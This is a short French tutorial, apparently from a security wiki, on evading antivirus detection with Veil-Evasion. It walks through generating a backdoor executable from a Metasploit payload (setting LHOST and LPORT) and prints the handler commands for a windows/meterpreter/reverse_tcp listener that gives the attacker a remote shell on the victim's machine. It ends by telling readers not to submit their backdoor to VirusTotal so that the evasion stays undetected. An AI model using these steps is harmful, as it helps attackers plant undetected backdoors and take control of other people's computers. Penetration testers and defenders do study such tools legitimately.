**Bypass d'antivirus avec Veil Evasion** **1.Presentation** Un antivirus est un logiciel qui a pour but de détecter et d'éradiquer les virus présents dans votre ordinateur, et de prendre des mesures pour les empêcher de nuire. Il peux fonctionner de plusieurs manières différentes mais les méthodes les plus utilisés sont la détection de signature et l'analyse comportemental. **2.Exploitation** Pour passer à travers les mécanismes de sécurité il faut réencoder le payload (si celui-ci est detecté) Metasploit fournit un certain nombre d'encoder type shikata_ga_nai ou encore bloxor. Aujourd'hui ils sont rapidement détecté par les antivirus. Pour contourner ce problème Veil-evasion est apparu. Vous pouvez le télécharger [[https://github.com/Veil-Framework/Veil-Evasion | ici]] __2.1 Méthode 1 : Utilisation de Veil-evasion__ {{ :metasploit:veil1.png?nolink |}} Veil-evasion embarque à l'heure actuel 51 payloads de metasploit Vous pouvez les lister en tappant : list {{ :metasploit:veil2.png?nolink |}} On choisit par exemple le payload 6. use 6 {{ :metasploit:veil3.png?nolink |}} Il faut définir les options : set LHOST 192.168.1.5 set LPORT 4444 où LHOST est mon ip et LPORT est le port sur laquelle la machine victime va initier la connexion vers mon ordinateur. Une fois toutes les options définis : generate {{ :metasploit:veil4.png?nolink |}} On définit le nom de notre backdoor. {{ :metasploit:veil5.png?nolink |}} Veil nous affiche le chemin pour récupérer notre executable ainsi que le Handler File contenant les commandes à tapper dans msfconsole pour mettre en place le listener. cat /usr/share/veil-output/handlers/ark1nar_handler.rc use exploit/multi/handler //permet d'utilier le listener set PAYLOAD windows/meterpreter/reverse_tcp //permet de définir le payload à injecter lors de la connexion set LHOST 192.168.1.5 //ip attaquant set LPORT 4444 //port écoute attaquant set ExitOnSession false //Ne pas couper le listener si une session est créée exploit -j // Executer le listener en fonds de tache **SURTOUT SURTOUT NE TESTER PAS VOTRE BACKDOOR SUR UN SERVICE DE TEST VIRAL EN LIGNE TEL QUE VIRUS TOTAL OU AUTRE** Vous ne feriez que gacher le travail de toute une communauté.